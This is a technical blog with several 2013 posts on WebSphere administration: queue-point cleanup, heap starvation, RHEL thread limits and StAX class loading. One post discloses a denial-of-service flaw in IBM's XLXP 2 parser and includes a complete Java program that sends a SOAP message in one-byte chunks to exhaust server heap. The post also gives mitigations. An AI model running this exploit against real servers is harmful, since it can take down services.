Thursday, October 31, 2013

How to get rid of SIBus queue points in state DELETE_PENDING

Sometimes, when deleting a destination from a SIBus, the corresponding queue point is not deleted from the underlying messaging engine, but remains in state DELETE_PENDING. This manifests itself in three ways:

  1. The queue point is still visible in the runtime view of the messaging engine in the admin console. To see this, go to the admin console page for the messaging engine, switch to the "Runtime" tab and then click on "Queue points".

  2. The MBean for the queue point is still registered by the messaging engine. The state attribute of that MBean will have value DELETE_PENDING.

  3. Each time the messaging engine is started, the following message appears in the logs:

    CWSIP0063I: The local destination <name> with UUID <uuid> has been marked for deletion.

It is not exactly clear under which conditions this issue occurs, but apparently it has to do with the existence of remote queue points, i.e. with the production or consumption of messages through a remote messaging engine.

To clean up these queue points and eliminate the recurring CWSIP0063I messages, use the following wsadmin script:

objName = AdminControl.makeObjectName('WebSphere:type=SIBQueuePoint,*')
queuepoints = AdminControl.queryNames_jmx(objName, None)
for queuepoint in queuepoints:
    name = queuepoint.getKeyProperty("name")
    if (not name.startswith("_") and AdminControl.invoke_jmx(queuepoint, 'getState', [], []) == 'DELETE_PENDING'):
        print 'Found SIBQueuePoint in state DELETE_PENDING: ' + name
        irs = AdminControl.invoke_jmx(queuepoint, 'listInboundReceivers', [], [])
        for ir in irs:
            AdminControl.invoke_jmx(queuepoint, 'flush', [ir], ['com.ibm.websphere.sib.admin.SIBInboundReceiver'])
            print 'Called flush on SIBQueuePoint for inbound receiver: ' + name
        cts = AdminControl.invoke_jmx(queuepoint, 'listRemoteConsumerTransmitters', [], [])
        for ct in cts:
            AdminControl.invoke_jmx(queuepoint, 'flush', [ct], ['com.ibm.websphere.sib.admin.SIBRemoteConsumerTransmitter'])
            print 'Called flush on SIBQueuePoint for remote consumer transmitter: ' + name

Update:

  • The flush operations used by the script are actually deprecated, but it the documentation doesn't specify which operations should be used instead.
  • The script may fail because the queue may already be deleted after the flush of the SIBInboundReceiver objects. In that case subsequent operations fail because the MBean no longer exist. As a workaround, simply reexecute the script.

Sunday, October 27, 2013

Heap starvation on WebSphere Process Server 6.1 caused by internal cache

Some time ago we had an incident where both members of a WebSphere Process Server 6.1 cluster encountered a heap starvation and needed to be restarted:

That incident occurred after one of the external service providers we connect to reported a problem causing an increase in response time.

Analysis of a heap dump taken before the restart of the WPS servers showed that a large amount of heap (480MB of 1.4GB) is consumed by objects of type com.ibm.ws.sca.internal.webservice.handler.PortHandler$OperationHandlerList. That appears to be an internal data structure used by SCA Web service imports (We are running lots of SCA modules on that cluster). A closer look at OperationHandlerList reveals that this class acts as a cache for objects of type com.ibm.ws.webservices.engine.client.Call, which is WebSphere's implementation of the javax.xml.rpc.Call API.

In fact, Call objects are used during the invocation of an operation on an SCA import with Web service binding, but they are both stateful and costly to create. To avoid this cost, WPS uses a caching mechanism that takes into account the stateful nature of these objects. Basically, OperationHandlerList appears to be designed as a pool of Call objects that is initially empty and that has a hardcoded maximum size of 100 entries. When an SCA import is invoked, WPS will attempt to retrieve an existing Call object from the pool or create a new one if none is available. After the completion of the invocation, WPS then puts the instance (back) to the pool for later reuse.

What is important to understand is that there is a separate pool (i.e. a separate OperationHandlerList instance) for each operation defined by each SCA Web service import. In addition, entries in these pools are never expunged. From the explanations given in the previous paragraph it is easy to see that the number of Call objects stored in a given OperationHandlerList instance is therefore equal to the maximum concurrency reached (since the start of the server) for invocations of the corresponding operation. That explains why the heap consumed by these pools may increase sharply after a performance problem with one of the Web services consumed by WPS: in general, a degraded response time of a service provider will cause an increase in concurrency because clients continue to send requests to WPS. That also explains why the memory is never released and the issue has the same symptoms as a memory leak.

As indicated above, there is a separate pool for each operation. This means that there may be a large number of these pools in a given WPS instance. However, this is usually not what causes the problem. The issue may already occur if there is only a limited number of operations for which the maximum concurrency increases. The reason is that an individual Call object may consume a significant amount of memory. E.g. in our case, we found one OperationHandlerList instance (that had reached its maximum capacity of 100 entries) that accounted for 177MB of used heap alone.

Note: At first glance, the issue described in this post seems to match APAR JR35210. However, that APAR simply describes the problem as a memory leak without giving precise information about the conditions that trigger the issue, except that it relates the issue to the usage of dynamic endpoints. However, our findings indicate that the issue is not (necessarily) related to dynamic endpoints. JR35210 may therefore be a different (but related) issue.

Saturday, October 26, 2013

WebSphere problems related to new default nproc limit in RHEL 6

We recently had an incident on one of our production systems running under Red Hat Enterprise Linux where under certain load conditions WebSphere Application Server would fail with an OutOfMemoryError with the following message:

Failed to create a thread: retVal -1073741830, errno 11

Error number 11 corresponds to EAGAIN and indicates that the C library function creating the thread fails because of insufficient resources. Often this is related to native memory starvation, but in our case it turned out that it was the nproc limit that was reached. That limit puts an upper bound on the number of processes a given user can create. It may affect WebSphere because in this context, Linux counts each thread as a distinct process.

Starting with RHEL 6, the soft nproc limit is set to 1024 by default, while in previous releases this was not the case. The corresponding configuration can be found in /etc/security/limits.d/90-nproc.conf. Generally a WebSphere instance only uses a few hundred of threads so that this problem may go unnoticed for some time before being triggered by an unusual load condition. You should also take into account that the limit applies to the sum of all threads created by all processes running with the same user as the WebSphere instance. In particular it is not unusual to have IBM HTTP Server running with the same user on the same host. Since the WebSphere plug-in uses a multithreaded processing model (and not an synchronous one), the nproc limit may be reached if the number of concurrent requests increases too much.

One solution is to remove or edit the 90-nproc.conf file to increase the nproc limit for all users. However, since the purpose of the new default value in RHEL 6 is to prevent accidental fork bombs, it may be better to define new hard and soft nproc limits only for the user running the WebSphere instance. While this is easy to configure, there is one other problem that needs to be taken into account.

For some unknown reasons, sudo (in contrast to su) is unable to set the soft limit for the new process to a value larger than the hard limit set on the parent process. If that occurs, instead of failing, sudo creates the new process with the same soft limit as the parent process. This means that if the hard nproc limit for normal users is lower than the soft nproc limit of the WebSphere user and an administrator uses sudo to start a WebSphere instance, then that instance will not have the expected soft nproc limit. To avoid this problem, you should do the following:

  • Increase the soft nproc limit for the user running WebSphere.
  • Increase the hard nproc for all users to the same (or a higher) value, keeping the soft limit unchanged (to avoid accidental fork bombs).

Note that you can verify that the limits are set correctly for a running WebSphere instance by determining the PID of the instance and checking the /proc/<pid>/limits file.

Wednesday, October 16, 2013

Quote of the day

The United States of America is prepared to use all elements of our power, including military force, to secure our core interests in the region. We will confront external aggression against our allies and partners, as we did in the Gulf War. We will ensure the free flow of energy from the region to the world. Although America is steadily reducing our own dependence on imported oil, the world still depends on the region’s energy supply, and a severe disruption could destabilize the entire global economy.

Barak Obama, Address to the United Nations General Assembly 2013.

I guess no other US president ever openly expressed the imperialist nature of american foreign policy that clearly...

Friday, October 11, 2013

Broken by design: WebSphere's default StAX implementation (part 1)

Recently I came across an issue in WebSphere's default StAX implementation (XLXP 2) where the parser unexpectedly consumed a huge amount of heap. The issue was triggered by a gzipped XML file containing a base64 encoded PDF document with several megabytes of content. A test showed that although the size of the XML document was of order of 10 MB, XLXP 2 required almost 1 GB of heap to parse the document (without any additional processing). That is of course totally unexpected: for large documents, an XML parser should never require an amount of heap 100 times as large as the size of the XML document.

After investigating the issue (with the XLXP 2 version in WAS 8.5.0.2), it turned out that the problem with IBM's parser is caused by the combination of three things:

  • Irrespective of the value of the javax.xml.stream.isCoalescing property (XMLInputFactory.IS_COALESCING), the parser will always return a text node in the input document as a single CHARACTERS event (where the precise meaning of "text node" is a sequence of CharData and/or Reference tokens neither preceded nor followed by a CharData or Reference token).

    For readers who are not experts in the StAX specification, this requires some additional explanations. With respect to coalescing, the only requirement stipulated by StAX (which is notoriously underspecified) is that enabling coalescing mode "requires the processor to coalesce adjacent character data". There are two interpretations of this requirement:

    • The first one is that this requirement is simply related to how CDATA sections are processed. If coalescing is enabled, then CDATA sections nodes are implicitly converted to text nodes and merged with adjacent text nodes. In non coalescing mode, CDATA sections are reported as distinct events, such that there is one and only one event for each text node and CDATA section in the input document. This interpretation corresponds to the definition of coalescing used by DOM (see DocumentBuilderFactory#setCoalescing()).
    • The second interpretation goes a step further and assumes that in non coalescing mode, the parser should handle text nodes in a way similar to SAX, i.e. split text nodes that are larger than parser's input buffer into chunks. In this case, a text node is reported as one or more CHARACTERS events. This allows the parser to process text nodes of arbitrary length with constant memory.

    BEA's original reference implementation and XLXP 2 are based on the first interpretation, while SJSXP (the StAX implementation in Oracle's JRE) and Woodstox use the second interpretation. Note that for applications using StAX, this doesn't really make any difference because an application using a StAX parser in non coalescing mode must be written such that it is able to correctly process any sequence of CHARACTERS and CDATA events.

  • XLXP 2 uses a separate buffer for each read operation on the underlying input stream, i.e. for each read operation, the parser will either allocate a new buffer or recycle a previously created buffer that is no longer in use. That is the case even if the previous read operation didn't fill the buffer completely: XLXP 2 will not attempt to read data into the buffer used during the previous read operation. By default, the size of each buffer is 64 KB.

  • When processing character data, the buffers containing the corresponding (encoded) data from the underlying stream remain in use (i.e. cannot be recycled) until the data has been reported back to the application. Note that this is a design choice: the parser could as well have been designed to accumulate the decoded character data in an intermediary buffer and immediately release the original buffers.

This has two consequences:

  • When processing a text node from the input document, all buffers containing chunks of data for that text node remain in use until the parser reaches the end of the text node.
  • If the read operations on the underlying input stream return less than the requested number of bytes (i.e. the buffer size), then these buffers will only be partially filled.

This means that processing a text node may require much more memory than one would expect based on the length of that text node. Since the default buffer size is 64 KB, in the extreme case (where each read operation on the input stream returns a single byte), the parser may need 65536 times more memory than the length of the text node. In the case I came across, the XML document contained a text node of around 9 million characters and the input stream was a GZIPInputStream which returned more or less 600 bytes per read operation. A simple calculation shows that XLXP 2 will require of order of 900 MB of heap to process that text node.

IBM's reaction to this was that XLXP 2 is "working as designed" (!) and that the issue can be mitigated with the help of two system properties:

com.ibm.xml.xlxp2.api.util.encoding.DataSourceFactory.bufferLength
Obviously, this system property specifies the size of the buffers described earlier. Setting it to a smaller value than the default 65536 bytes will reduce the amount of unused space. On the other hand, if the value is too small, then this will obviously have an impact on performance. Note that the fact that this parameter is specified as a system property is especially unfortunate, because it will affect all applications running on a given WebSphere instance.
com.ibm.xml.xlxp2.api.util.Pool.STRONG_REFERENCE_POOL_MAXIMUM_SIZE
This property was introduced by APAR PM42465 and is related to pooling of XMLStreamReader objects, not buffers. Therefore it has no impact on the problem described here.

However, it should be clear by now that adjusting these system property doesn't eliminate the problem completely, unless one uses an unreasonable small buffer size. This raises another interesting question: considering that WebSphere's JAX-WS implementation relies on StAX and that XLXP 2 may under certain circumstances allocate an amount of heap that is several order of magnitudes larger than the message size, isn't that a vector for a denial-of-service attack? If it's possible to construct a request that tricks XLXP 2 into reading multiple small chunks from the incoming SOAP message, couldn't this be used to trigger an OOM error on the target application server?

It turns out that unfortunately this is indeed possible. The attack takes advantage of the fact that when WebSphere receives a POST request that uses the chunked transfer encoding, the Web container will deliver each chunk separately to the application. If the request is dispatched to a JAX-WS endpoint this means that each chunk is delivered individually to the StAX parser, which is exactly the attack vector we are looking for. To exploit this vulnerability, one simply has to construct a SOAP message with a moderately large text node (let's say 10000 characters) and send that message to a JAX-WS endpoint using 1-byte chunks (at least for the part containing the text node). To process that text node, XLXP 2 will have to allocate 10000 buffers, each one 64 KB in size (assuming that the default configuration is used), which means that more than 600 MB of heap are required.

The following small Java program can be used to test if a particular (JAX-WS endpoint on a given) WebSphere instance is vulnerable:

public class XLXP2DoS {
  private static final String CHARSET = "utf-8";
  
  public static void main(String[] args) throws Exception {
    String host = "localhost";
    int port = 9080;
    String path = "/myapp/myendpoint";
    Socket socket = new Socket(host, port);
    OutputStream out = socket.getOutputStream();
    out.write(("POST " + path + " HTTP/1.1\r\n"
        + "Host: " + host + ":" + port + "\r\n"
        + "Content-Type: text/xml; charset=" + CHARSET + "\r\n"
        + "Transfer-Encoding: chunked\r\n"
        + "SOAP-Action: \"\"\r\n\r\n").getBytes("ascii"));
    writeChunk(out, "<s:Envelope xmlns:s='http://schemas.xmlsoap.org/soap/envelope/'>"
        + "<s:Header><p:dummy xmlns:p='urn:dummy'>");
    for (int i=0; i<10000; i++) {
      writeChunk(out, "A");
    }
    writeChunk(out, "</p:dummy></s:Header><s:Body/></s:Envelope>");
    out.write("0\r\n\r\n".getBytes("ascii"));
    socket.close();
  }
  
  private static void writeChunk(OutputStream out, String data) throws IOException {
    out.write((Integer.toHexString(data.length()) + "\r\n").getBytes("ascii"));
    out.write(data.getBytes(CHARSET));
    out.write("\r\n".getBytes("ascii"));
  }
}

The vulnerability has some features that make it rather dangerous:

  • Since the amount of heap used is several order of magnitudes larger than the message size, it is generally possible to carry out this attack even against application servers with a maximum POST request size configured in the HTTP transport channel settings.
  • An HTTP server in front of the application server doesn't protect against the attack. The reason is that the WebSphere plug-in forwards the chunks unmodified to the target server. The same will be true for most types of load balancers. For reverse proxies other than IBM HTTP Server this may or may not be true. On the other hand, a security gateway (such as DataPower) or an ESB will likely protect against this attack.
  • Since the request is relatively small, it will be difficult to distinguish from other requests and to trace back to its source.

One possible way to fix this vulnerability is to use another StAX implementation, as described in a previous post. In fact, switching the StAX implementation for a given Java EE application also changes the StAX implementation used to process SOAP messages for JAX-WS endpoints exposed by that application. Since WebSphere's JAX-WS implementation is based on Apache Axis2 and Apache Axiom, and the recommended StAX implementation for Axiom is Woodstox, that particular StAX implementation may be the best choice. Note that this may still have some unexpected side effects. In particular, XLXP 2 is known to implement some optimizations that are designed to work together with the JAXB 2 implementation in WebSphere. Obviously these optimizations will no longer work if XLXP 2 is replaced by Woodstox. It is also not clear if using WebSphere's JAX-WS implementation with a non-IBM StAX implementation is supported by IBM, i.e. if you will get help if there is an interoperability issue.

Update: IBM finally acknowledged that there is an issue with XLXP 2 (although they avoided qualifying it as a security issue). See the second part of this article for a discussion about the "fix" IBM applied to solve the issue.

Wednesday, October 2, 2013

Broken by design: changing the StAX implementation in a JEE application on WebSphere

To change the StAX implementation used in a Java EE application it should normally be enough to simply add the JAR with the third party StAX implementation (such as Woodstox) to the application. E.g. if the application is a simple Web application, then it should be enough to add the JAR to WEB-INF/lib. The same is true for the SAX, DOM and XSLT implementations. The reason is that all these APIs (which are part of JAXP) use the so called JDK 1.3 service provider discovery mechanism. That mechanism uses the thread context class loader to locate the service provider (the StAX implementation in this case). On the other hand, the Java EE specification requires that the application server sets the thread context class loader correctly before handing over a request to the application. For a servlet request, this will be the class loader of the Web module, while for a call to an EJB (packaged in an EJB-JAR), this will be the application class loader (i.e. the class loader corresponding to the EAR). That makes it possible to have different applications deployed on the same server use different StAX implementations without the need to modify these applications.

All this works as expected on most application servers, except on WebSphere. On WebSphere, even with a third party StAX implementation packaged in the application, JAXP will still return the factories (XMLInputFactory, etc.) from the StAX implementation packaged with WebSphere, at least if the application uses the default (parent first) class loader delegation mode. Note that the implementation returned by JAXP is not the StAX implementation in the JDK shipped with WebSphere (which is XLXP 1), but the one found in plugins/com.ibm.ws.prereq.xlxp.jar (which is XLXP 2). The only way to work around this issue is to switch the delegation mode of the application or Web module to parent last (with all the difficulties that this implies on WebSphere) or to create a shared library with isolated class loader (which always uses parent last delegation mode).

In this blog post I will explain why this is so and what this tells us about the internals of WebSphere. First of all, remember that starting with version 6.1, WebSphere actually runs in an OSGi container. That is, the WebSphere runtime is actually composed of a set of OSGi bundles. These are the files that you can find in the plugins directory in the WebSphere installation, and as mentioned earlier, the StAX implementation used by WebSphere is actually packaged in one of these bundles. If you are familiar with OSGi, then you should know that each bundle has its own class loader. This raises an interesting question: how is JAXP actually able to load that StAX implementation from the thread context class loader in a Java EE application?

To answer that question, let's have a look at the class loader hierarchy of a typical Java EE application deployed on WebSphere (as seen in the class loader viewer in the admin console):

Some of the class loaders in that hierarchy are easy to identify:

  • 1 and 2 are created by the JRE. They load the classes that are required to bootstrap the OSGi container in which WebSphere runs.
  • 6 and 7 are the class loaders for the application and the (Web or EJB) module.

The interesting things actually happen in class loader number 3 (of type org.eclipse.osgi.internal.baseadaptor.DefaultClassLoader). Unfortunately there is no way to see this in the admin console, but it turns out that this is actually the class loader for one of the OSGi bundles of the WebSphere runtime, namely com.ibm.ws.runtime.gateway. That bundle doesn't really contain any code, but its manifest has the following entry:

DynamicImport-Package: *

What this means is that all packages exported by all OSGi bundles are visible to the class loader of that bundle. In other words, class loader number 3 not only delegates to its parent, but it can also delegate to the class loader of any of the WebSphere OSGi bundles, including of course com.ibm.ws.prereq.xlxp.jar. This is why JAXP is able to load that StAX implementation.

Note that before loading the StAX implementation, JAXP first needs to locate it. It does this by doing a lookup of the relevant META-INF/services resource (e.g. META-INF/services/javax.xml.stream.XMLInputFactory). That resource request is also delegated to all OSGi bundles. It appears that class loader number 4 is somehow involved in this, but this detail is not really relevant for the present discussion. The important thing to remember is that in the class loader hierarchy of a Java EE application, there is a class loader that delegates class loading and resource requests to all OSGi bundles of the WebSphere runtime.

Obviously this particular class loader hierarchy was not designed specifically for StAX. It actually ensures that applications have access to the standard Java EE and WebSphere specific APIs contained in the WebSphere bundles.

Now it is easy to understand why it is not possible to override the StAX implementation if the application is configured with the default parent first delegation mode: the lookup of the META-INF/services resource will return the resource included in com.ibm.ws.prereq.xlxp.jar, not the one in the StAX implementation packaged with the application. This changes when switching to parent last delegation mode (either by changing the configuration of the application/module class loader or by configuring a shared library with isolated class loader): in this case, the META-INF/services resource from the third party StAX implementation is returned first.

What has been said up to now applies to Java EE applications. On the other hand, WebSphere also uses StAX internally. E.g. the SCA runtime in WebSphere uses StAX to parse certain configuration files or deployment descriptors. This raises another interesting question. The JDK 1.3 service provider discovery mechanism has been designed with J2SE and J2EE environments in mind. On the other hand, it is a well known fact that this mechanism doesn't work well in an OSGi environment. The reason is that each OSGi bundle has its own class loader and that the thread context class loader is undefined in an OSGi environment. That is why well designed OSGi based containers don't load the StAX API classes (and other APIs that use the JDK 1.3 service provider discovery mechanism) from the JRE, but from custom bundles. Here are a couple of examples of such containers together with the link to the source code of the custom StAX API bundle:

Although the details differ, these bundles share a common feature: the code is basically identical to the code in the JRE, except for the implementation of XMLEventFactory, XMLInputFactory and XMLOutputFactory. With respect to the code in the JRE, these classes are modified to use an alternate provider discovery mechanism that is compatible with OSGi.

WebSphere doesn't use this approach. There is no StAX API bundle, and both Java EE applications and the code in the WebSphere bundles use the API classes loaded from the JRE. The question is then how the JDK 1.3 service provider discovery mechanism can return the expected StAX implementation if it is triggered by code in the WebSphere runtime. Obviously, if the code in the WebSphere runtime is invoked by a Java EE application, then the thread context class loader is set as described earlier and there is no problem. The question therefore only applies to WebSphere code executed outside of the context of any Java EE application, e.g. during the server startup or during the processing of an incoming request that has not yet been dispatched to an application.

The answer is that WebSphere ensures that all threads it creates have the context class loader set by default to the com.ibm.ws.bootstrap.ExtClassLoader we already encountered in the class loader hierarchy for a Java EE application shown above (see class loader 4). This is the case e.g. for all threads in the startup thread pool (which as the name suggests is used during server startup) and all idle Web container threads. Since that class loader can delegate to any bundle class loader, the JDK 1.3 service provider discovery mechanism will indeed be able to locate the StAX implementation in the com.ibm.ws.prereq.xlxp.jar bundle.

To summarize, the difficulties to change the StAX implementation can be traced back to the combination of two decisions made by IBM in the design of WebSphere:

  1. The decision not to use the StAX implementation in the JRE, but instead to use another StAX implementation deployed as an OSGi bundle in the WebSphere runtime. (Note that this is specific to StAX. For SAX, DOM and XSLT, WebSphere uses the default implementations in the JRE. This explains why the issue described in this post only occurs for StAX.)
  2. The decision to use the StAX API classes from the JRE and therefore to rely on the JDK 1.3 service provider discovery mechanism. If IBM had chosen to use the same design pattern as Geronimo and ServiceMix (and others), then they could have implemented a modified provider discovery mechanism that doesn't need the META-INF/services resources to locate the default StAX implementation in the com.ibm.ws.prereq.xlxp.jar bundle.

The conclusion is that the need to switch to parent last delegation mode to make this work is due to WebSphere's design. Whether one considers this as "working as designed" or "broken by design" is of course purely subjective... IBM support will of course tell you that it is working as designed and that changing the class loader delegation mode is not a workaround, but simply a requirement in order to use a third party StAX implementation. Your mileage may vary.